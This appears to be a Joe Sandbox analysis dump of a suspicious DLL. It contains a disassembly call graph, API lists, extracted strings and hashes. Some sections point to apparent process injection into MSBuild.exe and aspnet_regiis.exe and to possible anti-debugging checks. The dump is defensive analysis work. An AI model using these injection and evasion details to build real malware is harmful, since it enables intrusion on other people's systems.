6cf4ac93 GetCurrentProcess 11893->11895 11898 6cf4ae93 CreateFileMappingA 11893->11898 11894->11893 11909 6cf5fb20 11895->11909 11898->11893 11900 6cf4bedb std::bad_exception::bad_exception 11899->11900 11901 6cf4c39f 11900->11901 11904 6cf4c0f8 NtQueryInformationProcess 11900->11904 11902 6cf5ed80 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 11901->11902 11903 6cf4c3af 11902->11903 11903->11867 11904->11900 11906 6cf4a3a6 11905->11906 11906->11906 11907 6cf5ed80 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 11906->11907 11908 6cf4a511 11907->11908 11908->11867 11910 6cf4acd4 GetModuleHandleA 11909->11910 11910->11893 11821 6cf5f134 11822 6cf5f142 11821->11822 11823 6cf5f13d 11821->11823 11827 6cf5effe 11822->11827 11842 6cf5f318 11823->11842 11828 6cf5f00a ___scrt_is_nonwritable_in_current_image 11827->11828 11829 6cf5f033 dllmain_raw 11828->11829 11830 6cf5f02e 11828->11830 11838 6cf5f019 11828->11838 11831 6cf5f04d dllmain_crt_dispatch 11829->11831 11829->11838 11832 6cf542c0 __DllMainCRTStartup@12 5 API calls 11830->11832 11831->11830 11831->11838 11833 6cf5f06e 11832->11833 11834 6cf5f09f 11833->11834 11837 6cf542c0 __DllMainCRTStartup@12 5 API calls 11833->11837 11835 6cf5f0a8 dllmain_crt_dispatch 11834->11835 11834->11838 11836 6cf5f0bb dllmain_raw 11835->11836 11835->11838 11836->11838 11839 6cf5f086 11837->11839 11840 6cf5ef4e __DllMainCRTStartup@12 86 API calls 11839->11840 11841 6cf5f094 dllmain_raw 11840->11841 11841->11834 11843 6cf5f32e 11842->11843 11845 6cf5f337 11843->11845 11846 6cf5f2cb GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 11843->11846 11845->11822 11846->11845 11911 6cf641be 11926 6cf6620d 11911->11926 11916 6cf641e6 11953 6cf64217 11916->11953 11917 6cf641da 11919 6cf650b0 ___free_lconv_mon 14 API calls 11917->11919 11920 6cf641e0 11919->11920 11922 6cf650b0 ___free_lconv_mon 14 API calls 11923 6cf6420a 11922->11923 11924 6cf650b0 ___free_lconv_mon 14 API calls 11923->11924 11925 6cf64210 11924->11925 11927 6cf66216 11926->11927 11928 6cf641cf 11926->11928 11975 6cf64cf2 11927->11975 11932 6cf66764 GetEnvironmentStringsW 11928->11932 11933 6cf6677c 11932->11933 11938 6cf641d4 11932->11938 11934 6cf666c1 ___scrt_uninitialize_crt WideCharToMultiByte 11933->11934 11935 6cf66799 11934->11935 11936 6cf667a3 FreeEnvironmentStringsW 11935->11936 11937 6cf667ae 11935->11937 11936->11938 11939 6cf65062 15 API calls 11937->11939 11938->11916 11938->11917 11940 6cf667b5 11939->11940 11941 6cf667ce 11940->11941 11942 6cf667bd 11940->11942 11944 6cf666c1 ___scrt_uninitialize_crt WideCharToMultiByte 11941->11944 11943 6cf650b0 ___free_lconv_mon 14 API calls 11942->11943 11945 6cf667c2 FreeEnvironmentStringsW 11943->11945 11946 6cf667de 11944->11946 11945->11938 11947 6cf667e5 11946->11947 11948 6cf667ed 11946->11948 11949 6cf650b0 ___free_lconv_mon 14 API calls 11947->11949 11950 6cf650b0 ___free_lconv_mon 14 API calls 11948->11950 11951 6cf667eb FreeEnvironmentStringsW 11949->11951 11950->11951 11951->11938 11954 6cf6422c 11953->11954 11955 6cf651e6 __dosmaperr 14 API calls 11954->11955 11956 6cf64253 11955->11956 11957 6cf6425b 11956->11957 11967 6cf64265 11956->11967 11958 6cf650b0 ___free_lconv_mon 14 API calls 11957->11958 11974 6cf641ed 11958->11974 11959 6cf642c2 11960 6cf650b0 ___free_lconv_mon 14 API calls 11959->11960 11960->11974 11961 6cf651e6 __dosmaperr 14 API calls 11961->11967 11962 6cf642d1 12331 6cf642f9 11962->12331 11966 6cf650b0 ___free_lconv_mon 14 API calls 11969 6cf642de 11966->11969 11967->11959 11967->11961 11967->11962 11968 6cf642ec 11967->11968 11970 6cf650b0 ___free_lconv_mon 14 API calls 11967->11970 12322 6cf64710 11967->12322 12337 6cf63845 IsProcessorFeaturePresent 11968->12337 11972 6cf650b0 ___free_lconv_mon 14 API calls 11969->11972 11970->11967 11972->11974 11973 6cf642f8 11974->11922 11976 6cf64d03 11975->11976 11977 6cf64cfd 11975->11977 11979 6cf66b2b __dosmaperr 6 API calls 11976->11979 11996 6cf64d09 11976->11996 11978 6cf66aec __dosmaperr 6 API calls 11977->11978 11978->11976 11980 6cf64d1d 11979->11980 11981 6cf651e6 __dosmaperr 14 API calls 11980->11981 11980->11996 11983 6cf64d2d 11981->11983 11985 6cf64d35 11983->11985 11986 6cf64d4a 11983->11986 11987 6cf66b2b __dosmaperr 6 API calls 11985->11987 11988 6cf66b2b __dosmaperr 6 API calls 11986->11988 11997 6cf64d41 11987->11997 11989 6cf64d56 11988->11989 11990 6cf64d5a 11989->11990 11991 6cf64d69 11989->11991 11994 6cf66b2b __dosmaperr 6 API calls 11990->11994 11992 6cf64a39 __dosmaperr 14 API calls 11991->11992 11995 6cf64d74 11992->11995 11993 6cf650b0 ___free_lconv_mon 14 API calls 11993->11996 11994->11997 11998 6cf650b0 ___free_lconv_mon 14 API calls 11995->11998 11999 6cf64d0e 11996->11999 12023 6cf6476a 11996->12023 11997->11993 11998->11999 12000 6cf66018 11999->12000 12118 6cf6616d 12000->12118 12007 6cf66074 12010 6cf650b0 ___free_lconv_mon 14 API calls 12007->12010 12008 6cf66082 12143 6cf66268 12008->12143 12012 6cf6605b 12010->12012 12012->11928 12013 6cf660ba 12014 6cf651d3 __dosmaperr 14 API calls 12013->12014 12015 6cf660bf 12014->12015 12016 6cf650b0 ___free_lconv_mon 14 API calls 12015->12016 12016->12012 12017 6cf660d5 12020 6cf650b0 ___free_lconv_mon 14 API calls 12017->12020 12021 6cf66101 12017->12021 12019 6cf650b0 ___free_lconv_mon 14 API calls 12019->12012 12020->12021 12022 6cf6614a 12021->12022 12154 6cf65c91 12021->12154 12022->12019 12034 6cf67008 12023->12034 12027 6cf64784 IsProcessorFeaturePresent 12028 6cf64790 12027->12028 12064 6cf6361c 12028->12064 12030 6cf6477a 12030->12027 12033 6cf647a3 12030->12033 12070 6cf63e95 12033->12070 12073 6cf66f36 12034->12073 12037 6cf6704d 12038 6cf67059 ___scrt_is_nonwritable_in_current_image 12037->12038 12039 6cf64d88 __dosmaperr 14 API calls 12038->12039 12040 6cf670a9 12038->12040 12042 6cf670bb CallUnexpected 12038->12042 12047 6cf6708a CallUnexpected 12038->12047 12039->12047 12043 6cf651d3 __dosmaperr 14 API calls 12040->12043 12041 6cf67093 12041->12030 12044 6cf670f1 CallUnexpected 12042->12044 12084 6cf65003 EnterCriticalSection 12042->12084 12045 6cf670ae 12043->12045 12050 6cf6712e 12044->12050 12051 6cf6722b 12044->12051 12061 6cf6715c 12044->12061 12048 6cf63818 ___std_exception_copy 39 API calls 12045->12048 12047->12040 12047->12041 12047->12042 12048->12041 12050->12061 12085 6cf64c37 GetLastError 12050->12085 12053 6cf67236 12051->12053 12116 6cf6504b LeaveCriticalSection 12051->12116 12055 6cf63e95 CallUnexpected 21 API calls 12053->12055 12057 6cf6723e 12055->12057 12058 6cf64c37 _unexpected 39 API calls 12062 6cf671b1 12058->12062 12060 6cf64c37 _unexpected 39 API calls 12060->12061 12112 6cf671d7 12061->12112 12062->12041 12063 6cf64c37 _unexpected 39 API calls 12062->12063 12063->12041 12065 6cf63638 CallUnexpected std::bad_exception::bad_exception 12064->12065 12066 6cf63664 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 12065->12066 12069 6cf63735 CallUnexpected 12066->12069 12067 6cf5ed80 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 12068 6cf63753 12067->12068 12068->12033 12069->12067 12071 6cf63cd2 CallUnexpected 21 API calls 12070->12071 12072 6cf63ea6 12071->12072 12074 6cf66f42 ___scrt_is_nonwritable_in_current_image 12073->12074 12079 6cf65003 EnterCriticalSection 12074->12079 12076 6cf66f50 12080 6cf66f92 12076->12080 12079->12076 12083 6cf6504b LeaveCriticalSection 12080->12083 12082 6cf6476f 12082->12030 12082->12037 12083->12082 12084->12044 12086 6cf64c4d 12085->12086 12090 6cf64c53 12085->12090 12088 6cf66aec __dosmaperr 6 API calls 12086->12088 12087 6cf66b2b __dosmaperr 6 API calls 12089 6cf64c6f 12087->12089 12088->12090 12091 6cf64c57 SetLastError 12089->12091 12093 6cf651e6 __dosmaperr 14 API calls 12089->12093 12090->12087 12090->12091 12095 6cf64ce7 12091->12095 12096 6cf64cec 12091->12096 12094 6cf64c84 12093->12094 12097 6cf64c8c 12094->12097 12098 6cf64c9d 12094->12098 12095->12060 12099 6cf6476a CallUnexpected 37 API calls 12096->12099 12100 6cf66b2b __dosmaperr 6 API calls 12097->12100 12101 6cf66b2b __dosmaperr 6 API calls 12098->12101 12102 6cf64cf1 12099->12102 12103 6cf64c9a 12100->12103 12104 6cf64ca9 12101->12104 12108 6cf650b0 ___free_lconv_mon 14 API calls 12103->12108 12105 6cf64cc4 12104->12105 12106 6cf64cad 12104->12106 12109 6cf64a39 __dosmaperr 14 API calls 12105->12109 12107 6cf66b2b __dosmaperr 6 API calls 12106->12107 12107->12103 12108->12091 12110 6cf64ccf 12109->12110 12111 6cf650b0 ___free_lconv_mon 14 API calls 12110->12111 12111->12091 12113 6cf671db 12112->12113 12115 6cf671a3 12112->12115 12117 6cf6504b LeaveCriticalSection 12113->12117 12115->12041 12115->12058 12115->12062 12116->12053 12117->12115 12119 6cf66179 ___scrt_is_nonwritable_in_current_image 12118->12119 12125 6cf66193 12119->12125 12162 6cf65003 EnterCriticalSection 12119->12162 12121 6cf66042 12129 6cf65d9f 12121->12129 12122 6cf661cf 12163 6cf661ec 12122->12163 12124 6cf6476a CallUnexpected 39 API calls 12126 6cf6620c 12124->12126 12125->12121 12125->12124 12127 6cf661a3 12127->12122 12128 6cf650b0 ___free_lconv_mon 14 API calls 12127->12128 12128->12122 12167 6cf658a3 12129->12167 12132 6cf65dd2 12134 6cf65dd7 GetACP 12132->12134 12135 6cf65de9 12132->12135 12133 6cf65dc0 GetOEMCP 12133->12135 12134->12135 12135->12012 12136 6cf65062 12135->12136 12137 6cf650a0 12136->12137 12141 6cf65070 __dosmaperr 12136->12141 12139 6cf651d3 __dosmaperr 14 API calls 12137->12139 12138 6cf6508b RtlAllocateHeap 12140 6cf6509e 12138->12140 12138->12141 12139->12140 12140->12007 12140->12008 12141->12137 12141->12138 12142 6cf63935 __dosmaperr 2 API calls 12141->12142 12142->12141 12144 6cf65d9f 41 API calls 12143->12144 12145 6cf66288 12144->12145 12146 6cf662c5 IsValidCodePage 12145->12146 12151 6cf6638d 12145->12151 12153 6cf662e0 std::bad_exception::bad_exception 12145->12153 12149 6cf662d7 12146->12149 12146->12151 12147 6cf5ed80 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 12148 6cf660af 12147->12148 12148->12013 12148->12017 12150 6cf66300 GetCPInfo 12149->12150 12149->12153 12150->12151 12150->12153 12151->12147 12210 6cf65e73 12153->12210 12155 6cf65c9d ___scrt_is_nonwritable_in_current_image 12154->12155 12296 6cf65003 EnterCriticalSection 12155->12296 12157 6cf65ca7 12297 6cf65cde 12157->12297 12162->12127 12166 6cf6504b LeaveCriticalSection 12163->12166 12165 6cf661f3 12165->12125 12166->12165 12168 6cf658c1 12167->12168 12169 6cf658ba 12167->12169 12168->12169 12170 6cf64c37 _unexpected 39 API calls 12168->12170 12169->12132 12169->12133 12171 6cf658e2 12170->12171 12175 6cf6768d 12171->12175 12176 6cf658f8 12175->12176 12177 6cf676a0 12175->12177 12179 6cf676eb 12176->12179 12177->12176 12183 6cf67b6c 12177->12183 12180 6cf676fe 12179->12180 12182 6cf67713 12179->12182 12180->12182 12205 6cf66255 12180->12205 12182->12169 12184 6cf67b78 ___scrt_is_nonwritable_in_current_image 12183->12184 12185 6cf64c37 _unexpected 39 API calls 12184->12185 12186 6cf67b81 12185->12186 12187 6cf67bc7 12186->12187 12196 6cf65003 EnterCriticalSection 12186->12196 12187->12176 12189 6cf67b9f 12197 6cf67bed 12189->12197 12194 6cf6476a CallUnexpected 39 API calls 12195 6cf67bec 12194->12195 12196->12189 12198 6cf67bfb __dosmaperr 12197->12198 12200 6cf67bb0 12197->12200 12199 6cf67920 __dosmaperr 14 API calls 12198->12199 12198->12200 12199->12200 12201 6cf67bcc 12200->12201 12204 6cf6504b LeaveCriticalSection 12201->12204 12203 6cf67bc3 12203->12187 12203->12194 12204->12203 12206 6cf64c37 _unexpected 39 API calls 12205->12206 12207 6cf6625a 12206->12207 12208 6cf6616d ___scrt_uninitialize_crt 39 API calls 12207->12208 12209 6cf66265 12208->12209 12209->12182 12211 6cf65e9b GetCPInfo 12210->12211 12220 6cf65f64 12210->12220 12216 6cf65eb3 12211->12216 12211->12220 12213 6cf5ed80 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 12214 6cf66016 12213->12214 12214->12151 12221 6cf67ead 12216->12221 12219 6cf68863 43 API calls 12219->12220 12220->12213 12222 6cf658a3 39 API calls 12221->12222 12223 6cf67ecd 12222->12223 12241 6cf66607 12223->12241 12225 6cf67f81 12244 6cf67fae 12225->12244 12226 6cf67efa 12226->12225 12229 6cf65062 15 API calls 12226->12229 12231 6cf67f89 12226->12231 12232 6cf67f1f __alloca_probe_16 std::bad_exception::bad_exception 12226->12232 12227 6cf5ed80 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 12230 6cf65f1b 12227->12230 12229->12232 12236 6cf68863 12230->12236 12231->12227 12232->12225 12233 6cf66607 ___scrt_uninitialize_crt MultiByteToWideChar 12232->12233 12234 6cf67f68 12233->12234 12234->12225 12235 6cf67f6f GetStringTypeW 12234->12235 12235->12225 12237 6cf658a3 39 API calls 12236->12237 12238 6cf68876 12237->12238 12250 6cf68674 12238->12250 12248 6cf6656f 12241->12248 12245 6cf67fcb 12244->12245 12246 6cf67fba 12244->12246 12245->12231 12246->12245 12247 6cf650b0 ___free_lconv_mon 14 API calls 12246->12247 12247->12245 12249 6cf66580 MultiByteToWideChar 12248->12249 12249->12226 12251 6cf6868f 12250->12251 12252 6cf66607 ___scrt_uninitialize_crt MultiByteToWideChar 12251->12252 12256 6cf686d3 12252->12256 12253 6cf6884e 12255 6cf5ed80 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 12253->12255 12254 6cf687a1 12259 6cf67fae __freea 14 API calls 12254->12259 12257 6cf65f3c 12255->12257 12256->12253 12256->12254 12258 6cf65062 15 API calls 12256->12258 12260 6cf686f9 __alloca_probe_16 12256->12260 12257->12219 12258->12260 12259->12253 12260->12254 12261 6cf66607 ___scrt_uninitialize_crt MultiByteToWideChar 12260->12261 12262 6cf68742 12261->12262 12262->12254 12278 6cf66bb8 12262->12278 12265 6cf687b0 12267 6cf68839 12265->12267 12270 6cf65062 15 API calls 12265->12270 12271 6cf687c2 __alloca_probe_16 12265->12271 12266 6cf68778 12266->12254 12269 6cf66bb8 6 API calls 12266->12269 12268 6cf67fae __freea 14 API calls 12267->12268 12268->12254 12269->12254 12270->12271 12271->12267 12272 6cf66bb8 6 API calls 12271->12272 12273 6cf68805 12272->12273 12273->12267 12284 6cf666c1 12273->12284 12275 6cf6881f 12275->12267 12276 6cf68828 12275->12276 12277 6cf67fae __freea 14 API calls 12276->12277 12277->12254 12287 6cf6688b 12278->12287 12282 6cf66c09 LCMapStringW 12283 6cf66bc9 12282->12283 12283->12254 12283->12265 12283->12266 12285 6cf666d4 ___scrt_uninitialize_crt 12284->12285 12286 6cf66712 WideCharToMultiByte 12285->12286 12286->12275 12288 6cf6698a __dosmaperr 5 API calls 12287->12288 12289 6cf668a1 12288->12289 12289->12283 12290 6cf66c15 12289->12290 12293 6cf668a5 12290->12293 12292 6cf66c20 12292->12282 12294 6cf6698a __dosmaperr 5 API calls 12293->12294 12295 6cf668bb 12294->12295 12295->12292 12296->12157 12307 6cf6646d 12297->12307 12299 6cf65d00 12300 6cf6646d 39 API calls 12299->12300 12301 6cf65d1f 12300->12301 12302 6cf65cb4 12301->12302 12303 6cf650b0 ___free_lconv_mon 14 API calls 12301->12303 12304 6cf65cd2 12302->12304 12303->12302 12321 6cf6504b LeaveCriticalSection 12304->12321 12306 6cf65cc0 12306->12022 12308 6cf6647e 12307->12308 12314 6cf6647a __InternalCxxFrameHandler 12307->12314 12309 6cf66485 12308->12309 12313 6cf66498 std::bad_exception::bad_exception 12308->12313 12310 6cf651d3 __dosmaperr 14 API calls 12309->12310 12311 6cf6648a 12310->12311 12312 6cf63818 ___std_exception_copy 39 API calls 12311->12312 12312->12314 12313->12314 12315 6cf664c6 12313->12315 12316 6cf664cf 12313->12316 12314->12299 12317 6cf651d3 __dosmaperr 14 API calls 12315->12317 12316->12314 12318 6cf651d3 __dosmaperr 14 API calls 12316->12318 12319 6cf664cb 12317->12319 12318->12319 12320 6cf63818 ___std_exception_copy 39 API calls 12319->12320 12320->12314 12321->12306 12324 6cf6471e 12322->12324 12326 6cf6472c 12322->12326 12323 6cf651d3 __dosmaperr 14 API calls 12325 6cf64734 12323->12325 12324->12326 12329 6cf64744 12324->12329 12327 6cf63818 ___std_exception_copy 39 API calls 12325->12327 12326->12323 12328 6cf6473e 12327->12328 12328->11967 12329->12328 12330 6cf651d3 __dosmaperr 14 API calls 12329->12330 12330->12325 12332 6cf64306 12331->12332 12333 6cf642d7 12331->12333 12334 6cf6431d 12332->12334 12335 6cf650b0 ___free_lconv_mon 14 API calls 12332->12335 12333->11966 12336 6cf650b0 ___free_lconv_mon 14 API calls 12334->12336 12335->12332 12336->12333 12338 6cf63851 12337->12338 12339 6cf6361c CallUnexpected 8 API calls 12338->12339 12340 6cf63866 GetCurrentProcess TerminateProcess 12339->12340 12340->11973
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$Memory$Write$Thread$AllocVirtual$Create$ContextRemoteWindowWow64$CloseConsoleHandleReadResumeShow
                                                                                      • String ID: &aR$'9$+`h$@$B|g$C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe$D$MZx$P{U$P{U$dP8$dP8$kernel32.dll$ntdll.dll$s'S$~HU/$C$Ml$^+C$`&#
                                                                                      • API String ID: 2788316432-1234957121
                                                                                      • Opcode ID: ee4080451ea5ff6ddaeea6eb4e2392c0e25a35608c55fd9ff57fda9f000bc982
                                                                                      • Instruction ID: 785f1840509a96dbc7f2f1c6cea79ec8f4c189dfaf6a553a579cd35d43108002
                                                                                      • Opcode Fuzzy Hash: ee4080451ea5ff6ddaeea6eb4e2392c0e25a35608c55fd9ff57fda9f000bc982
                                                                                      • Instruction Fuzzy Hash: 42D35736B55226CFCB14CE7CC9943DA7BF2AB96310F508199D919EB751CA398F888F40
                                                                                      APIs
                                                                                      • GetCurrentProcess.KERNEL32 ref: 6CF4ACA1
                                                                                      • GetModuleHandleA.KERNEL32 ref: 6CF4ACE5
                                                                                      • K32GetModuleInformation.KERNEL32 ref: 6CF4ADC4
                                                                                      • CreateFileMappingA.KERNEL32 ref: 6CF4AEC8
                                                                                      • MapViewOfFile.KERNELBASE ref: 6CF4B1D5
                                                                                      • VirtualProtect.KERNELBASE ref: 6CF4B5B4
                                                                                      • VirtualProtect.KERNELBASE ref: 6CF4B6AD
                                                                                      • GetCurrentProcess.KERNEL32 ref: 6CF4B880
                                                                                      • GetModuleHandleA.KERNEL32 ref: 6CF4B8C4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: Module$CurrentFileHandleProcessProtectVirtual$CreateInformationMappingView
                                                                                      • String ID: *K,L$*K,L$=04$@
                                                                                      • API String ID: 1422715119-3093642429
                                                                                      • Opcode ID: 06d252b629959932c23f40f5bf7505fc7afc44cc1a05c8ea0919541eeca555cf
                                                                                      • Instruction ID: 6e33294cddef6d60c741fee285cc6f525a63ad8c359839f5a332eb8d68ed521a
                                                                                      • Opcode Fuzzy Hash: 06d252b629959932c23f40f5bf7505fc7afc44cc1a05c8ea0919541eeca555cf
                                                                                      • Instruction Fuzzy Hash: D0B2CD76E14604CFDB08CF7CC985BDEBBF1AB4A310F1085A9E819EB756C635994A8F01

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1508 6cf4bea0-6cf4bede GetModuleHandleW call 6cf4ba40 1511 6cf4bee5-6cf4bef0 1508->1511 1512 6cf4bef6-6cf4bf03 1511->1512 1513 6cf4c3ff-6cf4c407 1511->1513 1516 6cf4c232-6cf4c27c 1512->1516 1517 6cf4bf09-6cf4bf16 1512->1517 1515 6cf4c40e 1513->1515 1515->1511 1516->1515 1519 6cf4bf1c-6cf4bf29 1517->1519 1520 6cf4c28d-6cf4c2fb 1517->1520 1522 6cf4c043-6cf4c080 call 6cf5fb20 1519->1522 1523 6cf4bf2f-6cf4bf3c 1519->1523 1520->1515 1522->1515 1527 6cf4c281-6cf4c288 1523->1527 1528 6cf4bf42-6cf4bf4f 1523->1528 1527->1515 1530 6cf4c1a4-6cf4c1ba 1528->1530 1531 6cf4bf55-6cf4bf62 1528->1531 1530->1515 1533 6cf4c085-6cf4c0f3 1531->1533 1534 6cf4bf68-6cf4bf75 1531->1534 1533->1515 1536 6cf4c36e-6cf4c37c 1534->1536 1537 6cf4bf7b-6cf4bf88 1534->1537 1536->1515 1539 6cf4bf8e-6cf4bf9b 1537->1539 1540 6cf4c3b9-6cf4c3ee 1537->1540 1542 6cf4bfa1-6cf4bfae 1539->1542 1543 6cf4c38d-6cf4c39a 1539->1543 1540->1515 1546 6cf4bfb4-6cf4bfc1 1542->1546 1547 6cf4c381-6cf4c388 1542->1547 1543->1515 1549 6cf4bfc7-6cf4bfd4 1546->1549 1550 6cf4c39f-6cf4c3b8 call 6cf5ed80 1546->1550 1547->1515 1554 6cf4c362-6cf4c369 1549->1554 1555 6cf4bfda-6cf4bfe7 1549->1555 1554->1515 1557 6cf4bfed-6cf4bffa 1555->1557 1558 6cf4c1bf-6cf4c22d 1555->1558 1560 6cf4c356-6cf4c35d 1557->1560 1561 6cf4c000-6cf4c00d 1557->1561 1558->1515 1560->1515 1563 6cf4c013-6cf4c020 1561->1563 1564 6cf4c0f8-6cf4c19f NtQueryInformationProcess 1561->1564 1566 6cf4c026-6cf4c033 1563->1566 1567 6cf4c300-6cf4c351 1563->1567 1564->1515 1569 6cf4c3f3-6cf4c3fa 1566->1569 1570 6cf4c039-6cf4c03e 1566->1570 1567->1515 1569->1515 1570->1515
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: HandleModule
                                                                                      • String ID: CYT-$NtQueryInformationProcess$ntdll.dll
                                                                                      • API String ID: 4139908857-710202094
                                                                                      • Opcode ID: 1e7568b3513b15b59d9a6992666f00bd07616c750d9341e1691e795e227e8409
                                                                                      • Instruction ID: a2bc08c9510a00a35cad7c7111a4469518fd51d0dca6b2bc40f924a1e8a31890
                                                                                      • Opcode Fuzzy Hash: 1e7568b3513b15b59d9a6992666f00bd07616c750d9341e1691e795e227e8409
                                                                                      • Instruction Fuzzy Hash: 5BD1C072E442058FCB04DEBDC5943EEBFF2AB86324F11D51AE415DBB9AD23686098F41

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1458 6cf5ef4e-6cf5ef61 call 6cf5f800 1461 6cf5ef67-6cf5ef89 call 6cf5f3e8 1458->1461 1462 6cf5ef63-6cf5ef65 1458->1462 1466 6cf5eff6-6cf5f00f call 6cf5f682 call 6cf5f800 1461->1466 1467 6cf5ef8b-6cf5efce call 6cf5f4b3 call 6cf5f36f call 6cf5f7cb call 6cf5efe3 call 6cf5f654 call 6cf5eff0 1461->1467 1463 6cf5efd0-6cf5efdf 1462->1463 1478 6cf5f011-6cf5f017 1466->1478 1479 6cf5f020-6cf5f027 1466->1479 1467->1463 1478->1479 1481 6cf5f019-6cf5f01b 1478->1481 1482 6cf5f033-6cf5f047 dllmain_raw 1479->1482 1483 6cf5f029-6cf5f02c 1479->1483 1485 6cf5f0f9-6cf5f108 1481->1485 1487 6cf5f0f0-6cf5f0f7 1482->1487 1488 6cf5f04d-6cf5f05e dllmain_crt_dispatch 1482->1488 1483->1482 1486 6cf5f02e-6cf5f031 1483->1486 1490 6cf5f064-6cf5f076 call 6cf542c0 1486->1490 1487->1485 1488->1487 1488->1490 1496 6cf5f09f-6cf5f0a1 1490->1496 1497 6cf5f078-6cf5f07a 1490->1497 1499 6cf5f0a3-6cf5f0a6 1496->1499 1500 6cf5f0a8-6cf5f0b9 dllmain_crt_dispatch 1496->1500 1497->1496 1501 6cf5f07c-6cf5f09a call 6cf542c0 call 6cf5ef4e dllmain_raw 1497->1501 1499->1487 1499->1500 1500->1487 1502 6cf5f0bb-6cf5f0ed dllmain_raw 1500->1502 1501->1496 1502->1487
                                                                                      APIs
                                                                                      • __RTC_Initialize.LIBCMT ref: 6CF5EF95
                                                                                      • ___scrt_uninitialize_crt.LIBCMT ref: 6CF5EFAF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: Initialize___scrt_uninitialize_crt
                                                                                      • String ID:
                                                                                      • API String ID: 2442719207-0
                                                                                      • Opcode ID: 18e0cf0ec406daeeef406fdb1e3fffc75a0db99264279b40eb117dbb0f38640c
                                                                                      • Instruction ID: c6a4086c862378cfbefad52f1621b497575cc95e7f1cd9e09ac46b49e19d04a2
                                                                                      • Opcode Fuzzy Hash: 18e0cf0ec406daeeef406fdb1e3fffc75a0db99264279b40eb117dbb0f38640c
                                                                                      • Instruction Fuzzy Hash: 3E412A32E04214EFDB908F65CC40BEF3AB5EF60768F954196E61457B40DB354D258BE0

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
